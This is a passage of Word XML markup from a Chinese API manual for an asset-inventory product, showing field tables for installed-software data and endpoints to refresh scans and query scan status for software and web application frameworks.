          <w:p w14:paraId="66F685CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A780CF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A967DD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6611E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="385F04FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FFDD42B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C1760C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DA9116" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02FCD409" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C49DFD7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="304EF55E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6027DC02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74300FCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72DABB21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EE26E4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491D28E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EB5F72F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D8AFCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DD0A57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>软件应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="611E7574" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FAE000C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1144AD2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B4182D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221029C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04F28D71" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="688CC0A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC79484" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55998197" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0D5E96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69920C94" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6828DFB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>binPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="031B947A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="541BBEBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47718898" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>windows为安装路径，Linux为二进制路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A2DA47F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F9700B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>configPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564C2D83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="437ADA6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B1A4749" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1477965B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="640C61F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A174C06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ACC4F5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：int(10) name：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">512) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname:varchar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B0D3359" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">关联进程列表 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">:进程id name:进程名 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ACFDD4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc115166117"/>
      <w:bookmarkStart w:id="86" w:name="软件应用信息扫描"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:t>软件应用信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="2369AE50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求软件应用信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850F6A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45131200" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/app/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A65FB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2E7E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E76EBB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233CEBA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73290CED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1E732" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F2FD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A7025"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12FD01A7"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73910F3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F351EB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E80B0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77FCD0E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38E63BCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="263D88AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F02D3AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A7F9459" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6B07E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="741A0BA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21B0C5CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc115166118"/>
      <w:bookmarkStart w:id="88" w:name="软件应用信息查询扫描状态"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:t>软件应用信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="15A09CAB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询软件应用信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA70E22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc115166119"/>
      <w:bookmarkStart w:id="90" w:name="web应用框架信息"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:t>Web应用框架信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="1CD6092B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A6FCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的Web应用框架信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F88ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404BF31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>Web应用框架信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5527A57F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D04EC26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E46709" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551C094" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>.Web应用框架信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55AE6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web应用框架信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11826E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web应用框架信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C5B950" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62F593" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用Web应用框架信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73D520" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C42CD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F892C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc115166120"/>
      <w:bookmarkStart w:id="92" w:name="web应用框架信息查询结果"/>
      <w:r>
        <w:t>Web应用框架信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="18232333" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询Web应用框架信息，按每台主机每个Web应用框架进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A25A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5283FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
